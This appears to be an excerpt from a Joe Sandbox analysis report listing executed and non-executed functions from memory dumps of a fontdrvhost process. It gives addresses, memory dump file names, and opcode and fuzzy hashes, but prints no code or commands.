                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_^
                                • API String ID: 0-1127923838
                                • Opcode ID: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction ID: bb51e7dd59e50f40135fd3801b95d70a1a48146bff9db65f52470e26cb1b2de1
                                • Opcode Fuzzy Hash: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction Fuzzy Hash: 5301D231A0A65E8FC756EF6898A15F637A0FF05318F04017AE06CCA193EE38A555C791
                                Function 00007FFD9B880F8D Relevance: .4, Instructions: 376COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ba181aa6cab73085f19b26817d4fe8a7f4902917801f2f13d62318ac11b0ce4e
                                • Instruction ID: 0d74a80b5b9681a6fc47cf589b6e4c9d15549aca86ca205bc7f5987a41fafd13
                                • Opcode Fuzzy Hash: ba181aa6cab73085f19b26817d4fe8a7f4902917801f2f13d62318ac11b0ce4e
                                • Instruction Fuzzy Hash: 4DD14F71E19A5D8FDB5CEB58D8A4BACB7B1FF58300F0441B9E01DE32A6DA346981CB01
                                Function 00007FFD9B887C89 Relevance: .3, Instructions: 334COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42ce2914ab32564791c8b2139766181d1406d4c1adaca38e733462de13c577eb
                                • Instruction ID: 39c85dd94f94051e83e3ce02fa09a37a2aba1d78d533e47af3bd11f9d4c2ca60
                                • Opcode Fuzzy Hash: 42ce2914ab32564791c8b2139766181d1406d4c1adaca38e733462de13c577eb
                                • Instruction Fuzzy Hash: 35C17C74A0AA5D8FEBA5DBA8C4957EC77B1FF58300F514179C01DD72A6CB386982CB80
                                Function 00007FFD9B883239 Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e3c6cf48eeaa5f4c9414de6ec970587e88acbe45c9d9bfbbc14e7a533df0a340
                                • Instruction ID: ea4b5eaa335638d88dd602e3a0051662426f968d1270de9ae65784296307a287
                                • Opcode Fuzzy Hash: e3c6cf48eeaa5f4c9414de6ec970587e88acbe45c9d9bfbbc14e7a533df0a340
                                • Instruction Fuzzy Hash: 60B15271E19A5D8FEB9CDB58D864BA8B7A1FF58300F0401B9E01DD72E6DE346981CB01
                                Function 00007FFD9B8805D8 Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction ID: 5508ef69b63f5e3adaf1975dd8308f1c9f0e47ddbfa512388eaa37b1b539d82e
                                • Opcode Fuzzy Hash: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction Fuzzy Hash: BB81C231B1DE494BDB68EF5888605B977E2FF9C704B15417EE46EC32A2DE34AD028781
                                Function 00007FFD9B886163 Relevance: .2, Instructions: 200COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8896db8658668737434909ab5a0fbac10897ce8a917a077ef10c545326f4d04d
                                • Instruction ID: 699515ef354458bb20c070e445d291b7ef911fd7e2e3e2cff4ab1627b7323d59
                                • Opcode Fuzzy Hash: 8896db8658668737434909ab5a0fbac10897ce8a917a077ef10c545326f4d04d
                                • Instruction Fuzzy Hash: 6D71A470E14A1D8FEB94EFA8D895BECB7B1FF58300F5041BAD41DE3296DA3469818B41
                                Function 00007FFD9B885931 Relevance: .2, Instructions: 196COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98a57c1ad49f1faa47959428b9535fb2b5ec08497ab581bcadd7c1cae1f0a2b3
                                • Instruction ID: 041e9443bdfd724652d531d43af6748c48d4a9bced0b42d1828636d8780fc274
                                • Opcode Fuzzy Hash: 98a57c1ad49f1faa47959428b9535fb2b5ec08497ab581bcadd7c1cae1f0a2b3
                                • Instruction Fuzzy Hash: 0551E730A09A8D8FDB95DFA8C454AADBBF1FF59310F1405BAD05DD7296CA34A842C741
                                Function 00007FFD9B88129D Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction ID: cc33624e63c8a795ed916fe0597753e52f242293ae017d1f46691da0bc5a88ff
                                • Opcode Fuzzy Hash: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction Fuzzy Hash: 7051C031B18A8E4FDB58DF1888645BA77E2FF9C304B15417EE46EC7292DE34E9028781
                                Function 00007FFD9B882CD9 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction ID: f7265e2cbb0f54c24ec97903a3b5348035567ebd98c9c27d109c1ad97466bcd2
                                • Opcode Fuzzy Hash: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction Fuzzy Hash: 0E513071A1995D8FDB94EF98C865AECBBF1FF59300F41016AE01DE72A2CA74A941CB40
                                Function 00007FFD9B88238D Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f1268641e55857ef5181e5f5bca5b081fcdd44f251f5129eae94ad4b0d35985c
                                • Instruction ID: fcda90f717f2213f2d3a8c6b2456a3c288aca16e2febb752e6e75e0b89062e52
                                • Opcode Fuzzy Hash: f1268641e55857ef5181e5f5bca5b081fcdd44f251f5129eae94ad4b0d35985c
                                • Instruction Fuzzy Hash: DA51D661A0EA9D4FEBA29BA88C657A87BA0EF59300F0540F7D09CC71E7DD346E85C741
                                Function 00007FFD9B881828 Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction ID: cfecb87381bc0584b196ba68d82882aaf02ce97d1dba5682117e0c51c367ed29
                                • Opcode Fuzzy Hash: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction Fuzzy Hash: E8317530E1EA1D8BE774BB9494227F8B2A1FF4D700F410279D06E921E5CF396A45C680
                                Function 00007FFD9B881CA9 Relevance: .1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e801c340006b2be7f57e55e327ebac6345cb82a4d11344511ecb7d14038962ac
                                • Instruction ID: 03b8dcd177e579e9a47dc5d85ed0f218302f00d324eee09030f6a9f4446dfa6f
                                • Opcode Fuzzy Hash: e801c340006b2be7f57e55e327ebac6345cb82a4d11344511ecb7d14038962ac
                                • Instruction Fuzzy Hash: D5416D71E09A1D8FDB54EB98D8A4AECBBF1FF59301F4001AAD019E72A1DB349945CB40
                                Function 00007FFD9B885FDD Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1d4b90fc479a60fd2679d15c1f9034cf89772a72a6bd11c4dc2d5a05726a5d9
                                • Instruction ID: 275a8c788b69a335899dc2a6cf2ef9b657cfbf20c6b2f5652b6e7f52cc72403b
                                • Opcode Fuzzy Hash: e1d4b90fc479a60fd2679d15c1f9034cf89772a72a6bd11c4dc2d5a05726a5d9
                                • Instruction Fuzzy Hash: 86417C70E14A4D8FDB84EBE8D865AEDBBF1FF48310F01017AE018E3296DA346941CB81
                                Function 00007FFD9B8864E9 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5927a6d5a169c0b19ffb14b4ae25e73a2a83dfd7a60b00c1290401618e174af0
                                • Instruction ID: f5934d8440c3844cc014622ac5914f3897116837d45d8ed981e097f3e798370e
                                • Opcode Fuzzy Hash: 5927a6d5a169c0b19ffb14b4ae25e73a2a83dfd7a60b00c1290401618e174af0
                                • Instruction Fuzzy Hash: A6417E70D0965D8FEB55DFA4C864AED77B1FF49300F1101BAD019D729ACB399981CB41
                                Function 00007FFD9B8883F5 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 63ba267738930fe00bc7abe3ce8a26b4ea707ec78fd14938bae6e637acba59da
                                • Instruction ID: 3b0968bfb987c281d9e916180d4b464f516cbbbb0837991e423a7e4c07e66f3d
                                • Opcode Fuzzy Hash: 63ba267738930fe00bc7abe3ce8a26b4ea707ec78fd14938bae6e637acba59da
                                • Instruction Fuzzy Hash: 47314832E0961E8FDB68DFA4D4646FEB7B1EF58300F11017AE019E32D1CA396A41CB91
                                Function 00007FFD9B882BC9 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fc185f058d767cbb7c1ee79f7c8e1c4cd1c93d7f105ed7790855777bab793855
                                • Instruction ID: 505111a99b68d92cd3c248e9f266e661c3c682d7a4c37cfa385b5f6dd85bedd8
                                • Opcode Fuzzy Hash: fc185f058d767cbb7c1ee79f7c8e1c4cd1c93d7f105ed7790855777bab793855
                                • Instruction Fuzzy Hash: 1B312A70D0A64D8FDB55DFA8D8646EDB7B1FF59300F10047AE019E3291DB389940CB81
                                Function 00007FFD9B88186A Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction ID: 4e7380405c5fa0d7a0b30fd0c10e7661c7191ef7aeee2f6f53402d1a05b7253a
                                • Opcode Fuzzy Hash: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction Fuzzy Hash: A7110D31E5A92D8FD768EBA0D4617FCB271FF0A701F4114B9D05EA6192CE396A44CB40
                                Function 00007FFD9B880C05 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59dd033124621b21ce7376cceb1c244dbe99e06b085242f2c30848e2aa546eb8
                                • Instruction ID: ff405d95cf1cbb3cd8d534c4cde900cb3489885dad2c313a31497140d3bd7b1e
                                • Opcode Fuzzy Hash: 59dd033124621b21ce7376cceb1c244dbe99e06b085242f2c30848e2aa546eb8
                                • Instruction Fuzzy Hash: 2411A331F15D1E4FDB68EB94D8657EDB362FF45300F81027AD029AB1A5DE3479458B80
                                Function 00007FFD9B8808B1 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 67c27343e0843bc06c40ffd068994412204c91ab268d7657fffff1bcce854dc4
                                • Instruction ID: fc1039c46c19f2ccb6e926ffae9c324372820c4f2a4153f40c1dfd45d3caa263
                                • Opcode Fuzzy Hash: 67c27343e0843bc06c40ffd068994412204c91ab268d7657fffff1bcce854dc4
                                • Instruction Fuzzy Hash: DBF02231A09A4D9FD794EB6888A95ECBFB0FF89340F8101FAD018C31A2DF3826958740
                                Function 00007FFD9B881F5D Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 337f1b939be6266fe7e4ff6c985bb9dc68bb86dbe2d8d4f57714d34d792ddf11
                                • Instruction ID: 3698388eaedd1d3a5175c2706f69d72b06f790c36b6d117c33987a83dcafdde8
                                • Opcode Fuzzy Hash: 337f1b939be6266fe7e4ff6c985bb9dc68bb86dbe2d8d4f57714d34d792ddf11
                                • Instruction Fuzzy Hash: EEF0283190EA4D4FD714EB6888656ED7FA0EF48240F4101F5D428C60E2DF386946C341
                                Function 00007FFD9B881241 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction ID: bcf24a5dc90924ff5e98082d103c336fa76c56cd22bf18f8858ea18e1c065664
                                • Opcode Fuzzy Hash: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction Fuzzy Hash: CEF0BE3050E64D8FCB66EF14C8556E93BA0FF5A300F0601AAE41CC71A2CB7ADA64CB81
                                Function 00007FFD9B888399 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d04b37a7352b28d701c463d5b1755cb2f1aeea1468404ea1e7c46b95697a55b
                                • Instruction ID: 437673ff52f25dc9e5d84addf058de7c718753d71cebfc0fa07981ef6f5f75df
                                • Opcode Fuzzy Hash: 2d04b37a7352b28d701c463d5b1755cb2f1aeea1468404ea1e7c46b95697a55b
                                • Instruction Fuzzy Hash: 8CF03C3091DA8D8FDB51EB6888686ED7FF0FF19304F4504A7D458D60A2D7389544CB41
                                Function 00007FFD9B880528 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction ID: e6f277bfdbd44c6b49878375b8cf172483cecaccf1affced6d632e91666cb1a1
                                • Opcode Fuzzy Hash: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction Fuzzy Hash: D6F05E30509A0E8FDB65EF5494116E577A0FF59304F000176E42CD6196CA35A660C781
                                Function 00007FFD9B881F15 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction ID: c3b67f0477bc8078d90c3d9f6a03a0dbe0e803dc6fb174bfdf36870062390c4a
                                • Opcode Fuzzy Hash: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction Fuzzy Hash: F0E09231C4FA8E4FD7216F6489661E97B60FF0A700F0616BAD06886092DB7C9628C741
                                Function 00007FFD9B8881E0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction ID: 61377d79ac162976e87490f508ceecd4766b034370dbb9cee9c3091ebeb45a03
                                • Opcode Fuzzy Hash: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction Fuzzy Hash: 1CE0D875989D4CCBCB649B599C5029477B1FB4D304F01026DE45CC7191D7355E56C301
                                Function 00007FFD9B88685C Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction ID: fdcc27c5cec694ea759e9b6e237a40e219626e3a4e5591844828d89103f0611b
                                • Opcode Fuzzy Hash: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction Fuzzy Hash: 23E06F32A0AE0C8BCB60AF98ACA028833A0FB8C308F01026AE45CC7180D3316A84C302
                                Function 00007FFD9B881C19 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction ID: efa91c2ae656b92b4a86e1885715b473e92c9d06697392523168f69425bc3470
                                • Opcode Fuzzy Hash: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction Fuzzy Hash: 3FE0A03184F78D4FD7626B6448611D57B70FF0A700F0A15A6D068C60A2DA6896588302
                                Function 00007FFD9B882536 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 49fb5343981c8aa8435aac9e5c456519a2422153f6a436eefc1ac1b3eebe5726
                                • Instruction ID: b9f5c892947d081d0b544d359565390017c8a3699ffd252c3a1eed79c8362c44
                                • Opcode Fuzzy Hash: 49fb5343981c8aa8435aac9e5c456519a2422153f6a436eefc1ac1b3eebe5726
                                • Instruction Fuzzy Hash: 53F09E71A5495E4FDFA4EF58C894BA9B3B1FB68340F1086E6901DE3255DA30AE858F80
                                Function 00007FFD9B880530 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: c7f4516cd99f28ee773ec3fcc90fa90195b457c14083bdfba21257d30318141a
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: D0E04F30509A0ECFDBA4EF58C4506A677A1FF5C304F100539E42CD6190CB35E6A0CB80
                                Function 00007FFD9B880C65 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9fb4a18e5e30055ac32efe1b6440e4d6168457d18e8ab7e602833b94938c2124
                                • Instruction ID: f68dc28e1408d529fcf041f6c0147a21ba50fa0c405b05a6ebe4bdb79d7c39f9
                                • Opcode Fuzzy Hash: 9fb4a18e5e30055ac32efe1b6440e4d6168457d18e8ab7e602833b94938c2124
                                • Instruction Fuzzy Hash: 3BD0E231B0592D8ECB64EA88E8107EDB771EF89311F8006B2C21CE3159CA306A428B81

                                Non-executed Functions

                                Function 00007FFD9B8806FA Relevance: 7.7, Strings: 6, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^U$O_^X$O_^f$O_^g
                                • API String ID: 0-1252858796
                                • Opcode ID: cc4013b17c218e5638511d7a2ddf1fa21ce7fa50690b2637e2f66d4c4ffed66a
                                • Instruction ID: e68626b80c5bcb7ef160820daebc656f64b3a71310be03e057027d77c6bd2453
                                • Opcode Fuzzy Hash: cc4013b17c218e5638511d7a2ddf1fa21ce7fa50690b2637e2f66d4c4ffed66a
                                • Instruction Fuzzy Hash: 03518C63B1FAC54FEB21279C3C651A83B90FF85B2171505F7E0A88A1A7F825A9468281
                                Function 00007FFD9B8806A5 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_I$O_^J$O_^K$O_^f$O_^g
                                • API String ID: 0-2965963803
                                • Opcode ID: a636d4ae03a1bef8462d6fd5dba39396a052232ce889302a4dcd37b7228c3306
                                • Instruction ID: 0bb0647acc2acea5912c8425b719c10f2b8562da3ca9080f8019508e275735f9
                                • Opcode Fuzzy Hash: a636d4ae03a1bef8462d6fd5dba39396a052232ce889302a4dcd37b7228c3306
                                • Instruction Fuzzy Hash: 98517B63B1FAC54FEB3537AC7C641A82790FFC5B2171505F7E0A8CA0E7E865A9468281

                                Executed Functions

                                Function 00007FFD9B890F88 Relevance: .6, Instructions: 614COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
